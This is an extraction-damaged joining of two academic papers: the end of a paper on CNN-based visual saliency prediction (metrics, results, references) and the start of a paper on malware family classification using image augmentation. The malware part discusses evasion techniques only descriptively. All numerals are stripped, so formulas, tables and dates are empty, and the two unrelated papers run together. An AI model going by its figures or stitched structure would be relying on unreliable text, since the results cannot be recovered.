iǵ (i)= , and ś and ǵ are the normalized saliency and the fixation maps, respectively. importantly, a similarity of one indicates that the distributions are the same whereas a zero indicates that they do not overlap. normalized scanpath saliency (nss) nss was is a simple correspondence measure between saliency maps and ground truth data, computed as the average normalized saliency at fixated locations. nss is, however, susceptible to false positives and relative differences in saliency across the image (bylinskii et al., ). to calculate nss given a saliency map s and a binary map of fixation location f, nss= n n∑ i= s̄(i)xf(i), ( ) where n= ∑ if(i) and s̄= s−µ(s) σ(s) , and n is the total number of human eye positions and σ( s) is the standard deviation. ghariba et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table comparison of the quantitative scores of several models on the toronto (bruce & tsotsos, ) dataset. model nss sim auc-judd auc-borji itti . . . . aim . . . . judd model . . . . gbvs . . . . mr-cnn . . . . cas . . . . proposed model . . . . auc-borji the auc-borji metric, based on ali borji’s code (borji et al., ), uses a uniform random sample of image pixels as negatives and defines false positives as any fixation (saliency) map values above the threshold of these pixels. the saliency map is a binary classifier that separates positive from negative samples at varying thresholds, the values of which are sampled at a fixed step size. the proportion of the saliency map values above the threshold at the fixation locations is the true positive (tp) rate. conversely, the proportion of the saliency map values that occur above the threshold sampled from random pixels (as many samples as fixations, sampled uniformly from all image pixels) is the false positive rate (fp). auc-judd the auc-judd metric (judd et al., ) is also popular for the evaluation of saliency models. as with auc-borji, positive and negative samples are separated at various thresholds by treating the saliency map as a binary classifier. unlike auc-borji, however, the thresholds are sampled from the saliency map’s values. the proportion of the saliency map’s values above a specific threshold at specific fixation locations is known as the true positive (tp) rate. alternatively, the proportion of the saliency map’s values that occur above the threshold of non-fixated pixels is the false positive (fp) rate. experimental results this section explains all the steps for implementing our work (see table for more details about experimental steps). specifically, training, adjusting the parameters, validating, and testing the proposed model on the aforementioned datasets (e.g., toronto, mit , mit , and dut-omron) are described in details. model training the most important step for the proposed model is model training. in this work, the proposed model was trained from scratch (i.e., full-training). training of models from scratch is challenging due to computational and data availability, leading to problems of overfitting. however, there are several techniques, such as normalization, data augmentation, and dropout layers that are useful for mitigating the problems generated from overfitting. ghariba et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. the full-training style has two different categories. in the first category, the cnn architecture is fully designed and trained from scratch. in this case, the number of cnn, pooling layers, the kind of activation function, neurons, learning rate, and the number of iterations should be determined. in the second category, the network architecture and the number of parameters remain unchanged, but the advantages of pre-existing architecture and full-training is applied to given images. in this study, the first category was employed. specifically, the proposed model was trained using the well-known dataset, salicon (see ‘salicon’ for more details) and was also validated using a specific validation dataset (i.e., images). this dataset is the largest available for visual attention (i.e., , images for training, , for validation) and was created for saliency applications. at the beginning of the training task, all filter weights were randomly initialized because a pre-trained network was not used in this study. a mini-batch of images was used in each iteration and the learning rate was set as . . the proposed model parameters were learned using the back-propagating loss function by stochastic gradient descent with a momentum (sgdm) optimizer. since the number of images available for the training task was limited (i.e., , images), we suggested using the date augmentation technique to increase the number of training images by creating modified versions of images in the dataset. this technique was carried out to mitigate overfitting by rotating at ◦ intervals. this technique also improves performance and the proposed model’s ability for generalization. figure illustrates the proposed model’s training progress from the mentioned training images (salicon). model testing in this step, we evaluated the proposed model using very well-known datasets including toronto, mit , mit , and dut-omron. based on the experimental results, one can see the proposed model has the ability to predict visual saliency in a given image. the output of the test image is described as the saliency map, which can be obtained from the last layer of the proposed model. all the training and testing tasks were performed on an intel cpu i - k machine with . ghz and gb ram memory. an nvidia geforce gtx ti gpu with gb of memory under cuda version . was also utilized in this work. discussion quantitative comparison of the proposed model with other advanced models to evaluate the efficiency of the proposed model for predicting visual saliency, we compared it to state-of-the-art models, itt, aim, judd model, gbvs, mr-cnn, cas, salgan, deepgaze i, deepgaze ii, and ml-net. the models were applied to four datasets (i.e., toronto, mit , mit , and dut-omron), and the quantitative results are presented in tables , , and , respectively. all these models differ in terms of computational speed (i.e., run time). table explains the runtime properties of the proposed model as well as the other visual saliency models. from this table, one can see ghariba et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure value of validation accuracy (a) and loss as a function of epochs (b). full-size doi: . /peerjcs. /fig- the run time of the proposed model is about s on our machine which has no gpu and is an intel cpu i - k. notably, the main difference between the proposed model and other state-of-art models is that the proposed model was specifically designed for saliency prediction, whereas the other pre-trained models were essentially designed for object recognition and then fine-tuned for the visual saliency prediction task. in addition, the proposed model was trained from scratch, which requires a large number of training images to provide a reasonable performance; however, the largest dataset available for this application contains only , images (e.g., salicon), which is considered relatively small to train a model from scratch. table shows that, with the toronto dataset, the proposed model outperforms other models (deep and classical models) in terms of nss; however, in terms of sim, auc-judd, and auc-borji, the gbvs model provides the best results (note that the bolded values are the best results). from table , one can see that with the mit dataset, the model that provides the best performance is deepgaz ii in terms of the auc-judd and auc-borji metrics. however, the salgan model produces the best results for the sim metric, while the ml-net model provides the best value for the nss metric. in table (for mit dataset), one can see that the proposed model surpasses the other models in terms of the ghariba et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table comparison of the quantitative scores of several models on the mit (judd, durand & tor- ralba, ) dataset. model nss sim auc-judd auc-borji itti (itti, koch & niebur, ) . . . . aim (bruce & tsotsos ) . . . . judd model (judd et al., ) . . . . gbvs (harel, koch & perona, ) . . . . mr-cnn (liu et al., ) . . . . cas (goferman, zelnik-manor & tal, ) . . . . salgan (pan et al., ) . . . . deepgaze i (kümmerer, theis & bethge, ) . . . . deepgaze ii (kümmerer et al., ) . . . . ml-net (cornia et al., ) . . . . proposed model . . . . table comparison of the quantitative scores of several models on the mit (judd et al., ) dataset. model nss sim auc-judd auc-borji itti . . . . aim . . . . judd model . . . . gbvs . . . . mr-cnn . . . . cas . . . . salgan . . . . ml-net . . . – proposed model . . . . table comparison of the quantitative scores of several models on the dut-omron (yang et al., ) dataset. model nss sim auc-judd auc-borji itti . . . . aim . . . . gbvs . . . . cas . . . . proposed model . . . . sim and auc-judd metrics, while the gbvs model provides the best results for the nss metric. finally, table shows that, with the dut-omron dataset, the proposed model achieved the best result in terms of the auc-judd metric, while the gbvs model is the best in terms of the auc-borji metric. ghariba et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table runtime of the proposed model and ten visual saliency models. model training deep learning run time bms no no . s cas no no s gbvs no no s itti no no s mr-cnn yes yes s (gpu) salnet yes yes . s (gpu) edn yes yes s (gpu) aim yes no s judd model yes no s dva yes yes . s (gpu) proposed model yes yes s qualitative comparison of the proposed model with other advanced models the qualitative results obtained by the proposed model are compared with five state- of-the art models, itti, fes, covsal, gbvs, and sds-gm (li & mou, ), on the aforementioned datasets (i.e., toronto, mit , mit , and dut-omron). figure shows the visual saliency map results and the proposed model visual saliency prediction, i.e., generating saliency map, within the given images. based on the evaluation of the proposed model, the proposed model produces saliency maps comparable to other state-of-the-art models. ablation study in this work, we evaluated several different aspects of the proposed model’s architecture. table illustrates the results of the experiments conducted in this work. based on the architecture of the proposed model, we suggested different scenarios in order to find an optimum architecture. several conclusions were obtained based on these experiments: ( ) from scenarios s to s , we can see the best global accuracy is achieved with encoder- decoder stages (i.e., global accuracy was . % and loss function was . ). ( ) s describes the proposed model using convolutional modules & inception modules. this architecture also produced the best global accuracy (i.e., global accuracy was . %, and loss function was . ) compared to s and s , which contain one and two inception modules, respectively. ( ) s is the last scenario we selected as the entire model, including convolutional, inception, and residual module (i.e., fig. ). this scenario produced a higher global accuracy (i.e., global accuracy was . %, and loss function was . ) compare to those of scenarios s and s . conclusions a new deep cnn model has been proposed in this paper for predicting visual saliency in the field of view. the main novelty of this model is its use of a new deep learning ghariba et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure the saliency maps obtained from the proposed model and five other state-of-the-art models for a sample image from the toronto, mit , mit , and dut-omron datasets. full-size doi: . /peerjcs. /fig- ghariba et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table different fcn models applied in this study. fcn models training validation scenarios description accuracy loss accuracy loss s convolutional modules . % . . % . s convolutional modules . % . . % . s convolutional modules . % . . % . s convolutional modules & . % . . % . s convolutional modules & inception modules . % . . % . s convolutional modules & inception modules . % . . % . s convolutional modules & inception modules . % . . % . s convolutional modules & residual modules . % . . % . s convolutional modules & residual modules . % . . % . s convolutional modules & residual modules . % . . % . s convolutional modules & inception module & residual module . % . . % . s convolutional modules & inception module & residual module . % . . % . s convolutional modules & inception module & residual module . % . . % . network with three encoders and three decoders (convolution and deconvolution) for visual saliency prediction, as well as its inclusion of two modules (inception and residual modules). the proposed model was trained from scratch and used the data augmentation technique to produce variations of images. the experiment results illustrate that the proposed model achieves superior performance relative to other state-of-the-art models. moreover, we discovered that an increase in the number of training images will increase the model prediction accuracy (i.e., improvement in model performance); however, the implementation of the model requires a large amount of memory and so it is difficult to use large numbers of training images. furthermore, because the model was trained from scratch, we expected the model will require more training data that other models, which are currently unavailable. a promising direction for future research is to collect a new dataset, generate its ground truth, and design new models with good performance and improved evaluation metrics based on the one proposed herein. extending the proposed model and applying it to examples of dynamic saliency (i.e., video images), is another plausible and interesting avenue of research. the proposed model may also facilitate other tasks, such as scene classification, salient object detection, and object detection, making it applicable in a number of disciplines. importantly, future models based on that proposed herein should be able to learn from high-level understanding, so they are able to, for example, detect the most important object of the image (e.g., focusing on the most important person in the room). saliency models also need to understand high-level semantics in the visual scene (i.e., semantic gap), and cognitive attention studies can help to overcome some of the restrictions identified in the proposed model. ghariba et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. additional information and declarations funding bashir muftah ghariba received financial support from the libyan ministry of higher education and scientific research, and elmergib university, alkhums, for the phd program. memorial university of newfoundland supported the publication fee. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: libyan ministry of higher education and scientific research. elmergib university, alkhums. memorial university of newfoundland. competing interests the authors declare there are no competing interests. author contributions • bashir muftah ghariba conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. • mohamed s shehata conceived and designed the experiments, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. • peter mcguire conceived and designed the experiments, prepared figures and/or tables, and approved the final draft. data availability the following information was supplied regarding data availability: the raw data and code are available at: - bylinskii et al., ( ): ‘‘mit saliency benchmark’’. mit. dataset. http://saliency.mit. edu/results_mit .html. - ghariba, shehata & mcguire ( ): ‘‘saliency-_model_- ’’. github. code. https://github.com/bashir /saliency-_model_- . references borji a, itti l. . state-of-the-art in visual attention modeling. ieee transactions on pattern analysis and machine intelligence : – . borji a, tavakoli hr, sihite dn, itti l. . analysis of scores, datasets, and models in visual saliency prediction. in: proceedings of the ieee international conference on computer vision. piscataway: ieee, – . bruce nd, catton c, janjic s. . a deeper look at saliency: feature contrast, seman- tics, and beyond. in: proceedings of the ieee conference on computer vision and pattern recognition. piscataway: ieee, – . ghariba et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://saliency.mit.edu/results_mit .html http://saliency.mit.edu/results_mit .html https://github.com/bashir /saliency-_model_- http://dx.doi.org/ . /peerj-cs. bruce n, tsotsos j. . saliency based on information maximization. in: advances in neural information processing systems. cambridge: mit press, – . bylinskii z, judd t, oliva a, torralba a, durand f. . what do different evaluation metrics tell us about saliency models? ieee transactions on pattern analysis and machine intelligence : – . cheng g, han j, guo l, liu z, bu s, ren j. . effective and efficient midlevel visual elements-oriented land-use classification using vhr remote sensing images. ieee transactions on geoscience and remote sensing : – doi . /tgrs. . . cornia m, baraldi l, serra g, cucchiara r. . a deep multi-level network for saliency prediction. in: rd international conference on pattern recognition (icpr). piscataway: ieee, – . deng j, dong w, socher r, li l-j, li k, fei-fei l. . imagenet: a large-scale hier- archical image database. in: ieee conference on computer vision and pattern recognition. ieee, – . fang s, li j, tian y, huang t, chen x. . learning discriminative subspaces on random contrasts for image saliency analysis. ieee transactions on neural networks and learning systems : – . fu k, gong c, gu iy-h, yang j. . normalized cut-based saliency detection by adaptive multi-level region merging. ieee transactions on image processing : – doi . /tip. . . gao d, han s, vasconcelos n. . discriminant saliency, the detection of suspicious coincidences, and applications to visual recognition. ieee transactions on pattern analysis and machine intelligence : – doi . /tpami. . . gao d, mahadevan v, vasconcelos n. . the discriminant center–surround hypothesis for bottom-up saliency. in: advances in neural information processing systems. – . gao d, vasconcelos n. . discriminant saliency for visual recognition from cluttered scenes. in: advances in neural information processing systems. – . ghariba b, shehata ms, mcguire p. . visual saliency prediction based on deep learning. information : doi . /info . girshick r, donahue j, darrell t, malik j. . rich feature hierarchies for accurate object detection and semantic segmentation. in: proceedings of the ieee conference on computer vision and pattern recognition. piscataway: ieee, – . goferman s, zelnik-manor l, tal a. . context-aware saliency detection. ieee transactions on pattern analysis and machine intelligence. – . gong c, tao d, liu w, maybank sj, fang m, fu k, yang j. . saliency propagation from simple to difficult. in: proceedings of the ieee conference on computer vision and pattern recognition. – . guo f, wang w, shen j, shao l, yang j, tao d, tang yy. . video saliency detection using object proposals. ieee transactions on cybernetics : – . harel j, koch c, perona p. . graph-based visual saliency. in: advances in neural information processing systems. cambridge: mit press, – . ghariba et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /tgrs. . http://dx.doi.org/ . /tip. . http://dx.doi.org/ . /tpami. . http://dx.doi.org/ . /info http://dx.doi.org/ . /peerj-cs. huang j, yang x, fang x, lin w, zhang r. . integrating visual saliency and consistency for re-ranking image search results. ieee transactions on multimedia : – doi . /tmm. . . huang x, shen c, boix x, zhao q. . salicon: reducing the semantic gap in saliency prediction by adapting deep neural networks. in: proceedings of the ieee interna- tional conference on computer vision. piscataway: ieee, – . itti l, koch c, niebur e. . a model of saliency-based visual attention for rapid scene analysis. ieee transactions on pattern analysis and machine intelligence : – doi . / . . jetley s, murray n, vig e. . end-to-end saliency mapping via probability distribu- tion prediction. in: proceedings of the ieee conference on computer vision and pattern recognition. – . jiang m, huang s, duan j, zhao q. . salicon: saliency in context. in: proceedings of the ieee conference on computer vision and pattern recognition. piscataway: ieee, – . judd t, durand f, torralba a. . a benchmark of computational models of saliency to predict human fixations. in: mit technical report. mit-csail-tr- - . cambridge: mit. judd t, ehinger k, durand f, torralba a. . learning to predict where humans look. in: ieee th international conference on computer vision. piscataway: ieee, – . kanan c, tong mh, zhang l, cottrell gw. . sun: top-down saliency using natural statistics. visual cognition : – doi . / . karami e, shehata ms, smith a. . adaptive polar active contour for segmentation and tracking in ultrasound videos. ieee transactions on circuits and systems for video technology : – . krizhevsky a, sutskever i, hinton ge. . imagenet classification with deep con- volutional neural networks. in: advances in neural information processing systems. cambridge: mit press, – . kruthiventi ss, ayush k, babu rv. . deepfix: a fully convolutional neural net- work for predicting human eye fixations. ieee transactions on image processing : – doi . /tip. . . kruthiventi ss, gudisa v, dholakiya jh, venkatesh babu r. . saliency unified: a deep architecture for simultaneous eye fixation prediction and salient object segmentation. in: proceedings of the ieee conference on computer vision and pattern recognition. piscataway: ieee, – . kümmerer m, theis l, bethge m. . deep gaze i: boosting saliency prediction with feature maps trained on imagenet. arxiv preprint. arxiv: . kümmerer m, wallis ts, bethge m. . deepgaze ii: reading fixations from deep features trained on object recognition. arxiv preprint. arxiv: . kümmerer m, wallis ts, gatys la, bethge m. . understanding low-and high- level contributions to fixation prediction. in: proceedings of the ieee international conference on computer vision. piscataway: ieee, – . ghariba et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /tmm. . http://dx.doi.org/ . / . http://dx.doi.org/ . / http://dx.doi.org/ . /tip. . http://arxiv.org/abs/ http://arxiv.org/abs/ http://dx.doi.org/ . /peerj-cs. le meur o, le callet p, barba d, thoreau d. . a coherent computational approach to model bottom-up visual attention. ieee transactions on pattern analysis and machine intelligence : – doi . /tpami. . . li y, hou x, koch c, rehg jm, yuille al. . the secrets of salient object segmenta- tion. in: proceedings of the ieee conference on computer vision and pattern recognition. piscataway: ieee, – . li y, mou x. . saliency detection based on structural dissimilarity induced by image quality assessment model. journal of electronic imaging : . lin t-y, maire m, belongie s, hays j, perona p, ramanan d, dollár p, zitnick cl. . microsoft coco: common objects in context. in: european conference on computer vision. piscataway: ieee, – . liu n, han j. . dhsnet: deep hierarchical saliency network for salient object detection. in: proceedings of the ieee conference on computer vision and pattern recognition. piscataway: ieee, – . liu n, han j, liu t, li x. . learning to predict eye fixations via multiresolution convolutional neural networks. ieee transactions on neural networks and learning systems : – . liu z, zhang x, luo s, le meur o. a. superpixel-based spatiotemporal saliency detection. ieee transactions on circuits and systems for video technology : – doi . /tcsvt. . . liu z, zou w, meur ole. b. saliency tree: a novel saliency detection framework. ieee transactions on image processing : – doi . /tip. . . long j, shelhamer e, darrell t. . fully convolutional networks for semantic segmentation. in: proceedings of the ieee conference on computer vision and pattern recognition. piscataway: ieee, – . lu x, li x. . multiresolution imaging. ieee transactions on cybernetics : – . lu x, li x, mou l. . semi-supervised multitask learning for scene recognition. ieee transactions on cybernetics : – . mackenzie ak, harris jm. . a link between attentional function, effective eye move- ments, and driving ability. journal of experimental psychology: human perception and performance : . mahadevan v, vasconcelos n. . saliency-based discriminant tracking. in: ieee conference on computer vision and pattern recognition. piscataway: ieee, – . mahdianpari m, salehi b, rezaee m, mohammadimanesh f, zhang y. . very deep convolutional neural networks for complex land cover mapping using multispectral remote sensing imagery. remote sensing : doi . /rs . pan j, sayrol e, giro-i nieto x, mcguinness k, o’connor ne. . shallow and deep convolutional networks for saliency prediction. in: proceedings of the ieee conference on computer vision and pattern recognition. piscataway: ieee, – . riche n, duvinage m, mancas m, gosselin b, dutoit t. . saliency and human fixations: state-of-the-art and study of comparison metrics. in: proceedings of the ieee international conference on computer vision. piscataway: ieee, – . ghariba et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /tpami. . http://dx.doi.org/ . /tcsvt. . http://dx.doi.org/ . /tip. . http://dx.doi.org/ . /rs http://dx.doi.org/ . /peerj-cs. simonyan k, zisserman a. . very deep convolutional networks for large-scale image recognition. arxiv preprint. arxiv: . szegedy c, liu w, jia y, sermanet p, reed s, anguelov d, erhan d, vanhoucke v, rabinovich a. . going deeper with convolutions. in: proceedings of the ieee conference on computer vision and pattern recognition. piscataway: ieee, – . vig e, dorr m, cox d. . large-scale optimization of hierarchical features for saliency prediction in natural images. in: proceedings of the ieee conference on computer vision and pattern recognition. piscataway: ieee, – . wang w, shen j. . deep visual attention prediction. ieee transactions on image processing : – . wang w, shen j, dong x, borji a, yang r. a. inferring salient objects from human fixations. in: ieee transactions on pattern analysis and machine intelligence. piscataway: ieee. wang w, shen j, shao l. a. video salient object detection via fully convolutional networks. ieee transactions on image processing : – . wang w, shen j, shao l, porikli f. . correspondence driven saliency transfer. ieee transactions on image processing : – doi . /tip. . . wang w, shen j, xie j, cheng m-m, ling h, borji a. b. revisiting video saliency prediction in the deep learning era. in: ieee transactions on pattern analysis and machine intelligence. piscataway: ieee. wang w, shen j, yang r, porikli f. b. saliency-aware video object segmentation. : – . yang c, zhang l, lu h, ruan x, yang m-h. . saliency detection via graph-based manifold ranking. in: proceedings of the ieee conference on computer vision and pattern recognition. piscataway: ieee, – . yao x, han j, cheng g, qian x, guo l. . semantic annotation of high-resolution satellite images via weakly supervised learning. ieee transactions on geoscience and remote sensing : – doi . /tgrs. . . ghariba et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://arxiv.org/abs/ http://dx.doi.org/ . /tip. . http://dx.doi.org/ . /tgrs. . http://dx.doi.org/ . /peerj-cs. data augmentation based malware detection using convolutional neural networks data augmentation based malware detection using convolutional neural networks ferhat ozgur catak , javed ahmed , kevser sahinbas and zahid hussain khand simula research laboratory, fornebu, norway center of excellence for robotics, artificial intelligence and blockchain (craib), department of computer science, sukkur iba university, sukkur, pakistan department of management information system, istanbul medipol university, istanbul, turkey department of computer science, sukkur iba university, sukkur, pakistan abstract due to advancements in malware competencies, cyber-attacks have been broadly observed in the digital world. cyber-attacks can hit an organization hard by causing several damages such as data breach, financial loss, and reputation loss. some of the most prominent examples of ransomware attacks in history are wannacry and petya, which impacted companies’ finances throughout the globe. both wannacry and petya caused operational processes inoperable by targeting critical infrastructure. it is quite impossible for anti-virus applications using traditional signature-based methods to detect this type of malware because they have different characteristics on each contaminated computer. the most important feature of this type of malware is that they change their contents using their mutation engines to create another hash representation of the executable file as they propagate from one computer to another. to overcome this method that attackers use to camouflage malware, we have created three-channel image files of malicious software. attackers make different variants of the same software because they modify the contents of the malware. in the solution to this problem, we created variants of the images by applying data augmentation methods. this article aims to provide an image augmentation enhanced deep convolutional neural network (cnn) models for detecting malware families in a metamorphic malware environment. the main contributions of the article consist of three components, including image generation from malware samples, image augmentation, and the last one is classifying the malware families by using a cnn model. in the first component, the collected malware samples are converted into binary file to -channel images using the windowing technique. the second component of the system create the augmented version of the images, and the last part builds a classification model. this study uses five different deep cnn model for malware family detection. the results obtained by the classifier demonstrate accuracy up to %, which is quite satisfactory. subjects artificial intelligence, security and privacy keywords convolutional neural networks, cybersecurity, image augmentation, malware analysis introduction recently our usage of technical gadgets has increased due to the aggressive invasion of technology in our daily life. the frequency of use for many devices has increased many how to cite this article catak fo, ahmed j, sahinbas k, khand zh. . data augmentation based malware detection using convolutional neural networks. peerj comput. sci. :e doi . /peerj-cs. submitted september accepted december published january corresponding author ferhat ozgur catak, ozgur@simula.no academic editor robertas damaševičius additional information and declarations can be found on page doi . /peerj-cs. copyright catak et al. distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:ozgur@�simula.�no https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ folds, including mobile phones, laptops, webcams, etc. motivated by market demand, the manufacturers have started to produce devices with attractive features ignoring the security weakness caused by offering such features. due to the fierce competition among the manufacturers and rapid product development, many products are released to the market with security weaknesses. this offers many opportunities for malicious software developers. malicious software, commonly known as malware, is intentionally designed to damage computer systems and exploit security weaknesses. malware is designed for a specific target, often attempting to camouflage itself in another way, with intentions such as file encryption, ransom, preventing a system from working, gaining unauthorized access to a network, data theft, or sabotage. malware targets various platforms such as servers, personal computers, mobile phones, and cameras to disrupt the system’s normal function. malware development has become a serious activity lately, and in the only first quarter of , around . million new malware has been found (https://www. av-test.org/en/statistics/malware/). malware has acquired advanced competencies and diversity in features, which significantly raises the importance of cybersecurity. cybersecurity activities in various organizations have increased (shamshirband et al., ; shamshirband & chronopoulos, ) due to its vital importance to the aforementioned problem. one of the essential cybersecurity activities is malware analysis. in order to be effectively protected from malware, the first thing to do is to recognize the malicious software and analyze their behavior well. in this respect, the critical point is to identify malicious software and classify them successfully. a family of malicious software also represents the malicious behavior to which it belongs. as a result, the countermeasures to be taken against these behaviors may vary according to malicious software families. several consecutive operations are generally performed within malware analysis. this task is mainly done using static and dynamic analysis methods, including the strings command to get the malicious ip addresses, entropy value if the suspicious executable file, executing the file in an isolated environment to record its behaviour. figure provides the new malicious programs number detected per year from to . in the period of and , the number of new threats has increased significantly due to an increase in the power of antivirus centers processing threats and the evolution in file-infecting technologies. in almost the same number of new malicious programs was detected as approximately million (https://securelist.com/ kaspersky-security-bulletin- -malware-evolution- / /). in , malware evolution has been almost identical to the previous one (https://securelist.com/kaspersky- security-bulletin-malware-evolution- / /). figure presents the number of new malware identified per year from to . it is observed a noticeable increase in the number of new malicious programs year by year. overall, malware activity has increased from to . malware developers, on the other hand, develop a variety of anti-analysis techniques with their broad knowledge of existing analysis methods. anti-debugging and anti- disassembly techniques are the two methods most commonly used by malware developers. such methods to bypass analysis are generally used to produce erroneous results by the catak et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://www.av-test.org/en/statistics/malware/ https://www.av-test.org/en/statistics/malware/ https://securelist.com/kaspersky-security-bulletin- -malware-evolution- / / https://securelist.com/kaspersky-security-bulletin- -malware-evolution- / / https://securelist.com/kaspersky-security-bulletin-malware-evolution- / / https://securelist.com/kaspersky-security-bulletin-malware-evolution- / / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ disassembler and debugger tools. in anti-debugging methods, malware developers often manipulate pointer address parameters used by jump op-code such as jz, jnz, jze. anti-debugging techniques are used by the developers to ensure that malware samples do not run under a debugger, and in that case, change the execution flow accordingly. in most cases, the reverse engineering process will be slow down by the anti-debugging technique. figure number of new malicious programs identified per year from – . full-size doi: . /peerj-cs. /fig- figure number of new malicious programs identified per year from – . full-size doi: . /peerj-cs. /fig- catak et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the automated malware detection systems used these days do not yield very successful results due to the aforementioned reasons. proper malware labeling is a challenging issue in this domain. an anti-virus application can detect malware as a trojan, whereas the same malware is labeled as a worm by another anti-virus application. it has become even more complicated with the advent of sophisticated malware. with the development of machine learning, it has been observed that these techniques are being used in the field of malware analysis. to use api calls as the feature vector is one of the first usages of machine learning algorithms for malicious software analysis (mira, ). n-grams are other commonly used methods for the quantification of api calls. the main reasons for using n-grams are to reduce computation-complexity of the model, to create a simple term-frequency × inverse-document-frequency (tf-idf) matrix, and to use traditional algorithms such as random forests, decision tree, and support vector machine (svm). although such an approach has produced high classification performance results, they remain inadequate for the current malware infection methods. malware analysts need sandbox applications to create api call datasets because a sandbox provides an isolated virtual machine (vm) with a secure and close network environment. the behaviour of malicious software runing in the vm are recorded. however, malware developers use anti-vm and anti-sandbox methods that integrate various virtual machine detection code snippets into their malicious code blocks. if the malicious software gets the impression of executing on a virtual machine or sandbox environment, then it changes its behaviour to complicate the analysis. the most widely used anti-vm and anti-sandbox methods are “checking cpuid instruction”, “vmware magic number”, “checking for known mac addresses”, “checking for processes indicating a vm”, “checking for existence of files indicating a vm” and “checking for running services”. although malware changes its behaviour and blocks dynamic analysis, some machine learning methods can be used to obtain malware families depending on the malware code. currently, the approach used for malware analysis is based on creating a grayscale image from malware code and then using classification algorithms. we created classification models by extracting only the behaviour of malware samples in our previous works (catak & yazı, ; yazı, catak & gul, ; catak et al., ). we executed all the malware samples in the cuckoo sandbox environment. whereas, in this study, harmful software did not operate in an isolated sandbox environment. this research’s main contribution is to develop a data augmentation enhanced malware family classification model that exploits augmentation for malware variants and takes advantage of a convolutional neural network (cnn) to improve image classification. herein, we demonstrate that the data augmentation-based -channel image classification can significantly influence malware family classification performance. malware developers use different methods to camouflage the malicious behaviour of malware while executing. there is no real execution phase in an operating system in our approach. another technique that malware developers apply is to put various modifications (such as noise) to the content when they propagate from one computer to another. catak et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ we used data augmentation methods to solve this camouflage technique to our malware image samples to detect their variants. the rest of the article is organized as follows: “related work” briefly describes the related work. in “system model”, we present the system model and consists of two subsections. the first subsection presents the image conversion, and the second subsection presents the data augmentation. “proposed approach” provides fine-grained details of the proposed approach and presents the malware classification algorithm. “experiments” provides an extensive analysis of results. finally, in “conclusion and future work”, we conclude the article and present some future research directions. related work malware analysis field has gained considerable attention from research community with rapid development of various techniques for malware detection. there is huge research literature in this area. since the proposed work is related to image-based analysis using deep learning techniques, the relevant research literature regarding image processing techniques for malware detection are briefly discussed in this section. one of the early studies conducted on malware images was done by nataraj et al. ( ). the authors proposed an image texture analysis-based technique for visualization and classification of different families of malware. this approach converts malware binaries into grayscale images. malware are classified using k-nearest neighbor technique with euclidean method. however, the system requires pre-processing of filtering to extract the image texture as features for classification. on the other hand, to extract the image texture as features for classification, the system requires pre-processing of filtering. kancherla & mukkamala ( ) proposed a low-level texture feature extraction technique for malware analysis parallel to nataraj’s technique. the authors converted malware binaries into images and then extracted discrete wavelets transform based texture features for classification. makandar & patrot ( ) identify new malware and their variants to extract wavelet transforms-based texture features, and then supply to feed forward artificial neural network for applying classification. kosmidis & kalloniatis ( ) described a two-step malware variant detection and classification method. in the first step, binary texture analysis applied through gist. in the second step, these texture features classified by using machine- learning techniques such as classification and clustering to identify malware. although the works mentioned above nataraj et al., ; kancherla & mukkamala, ; makandar & patrot, ; kosmidis & kalloniatis ( ) are helpful to detect and classify new malware and their variants, they still have some limitations. for instance, on the one hand, global texture features lose local information needed for classification. on the another hand, they have significant computation overheads to process a vast amount of malware. according to zhang et al. ( ), the malware classification problem can be converted into an image classification problem. their study provides to disassembles executable files into opcode sequences and then convert opcode into images for identifying whether the source file is benign or malware by using cnn. yue ( ) presents multifamily catak et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ malware classification approach by applying cnn. however, the performance is degraded due to the imbalance of malware families. the author proposes softmax loss function to mitigate this issue. this approach is reactive in nature to deal with scenarios where class imbalance is assumed. the other work by ni, qian & zhang ( ) propose a method for malware classification by applying deep learning techniques. their algorithm uses simhash and cnn techniques for malware classification. the algorithm converts the malware codes that is disassembled into grayscale images used simhash algorithm and after that uses cnn to identify their family. the performance improvement is ensured by using some methods such as bilinear interpolation, multi-hash and major block selection during the process. cui et al. ( ) propose a method that applies cnn with the bat algorithm together in order to robust the accuracy of the model. their implemented method converts the malicious code into grayscale images. the method’s images are classified by using a cnn and bat algorithm 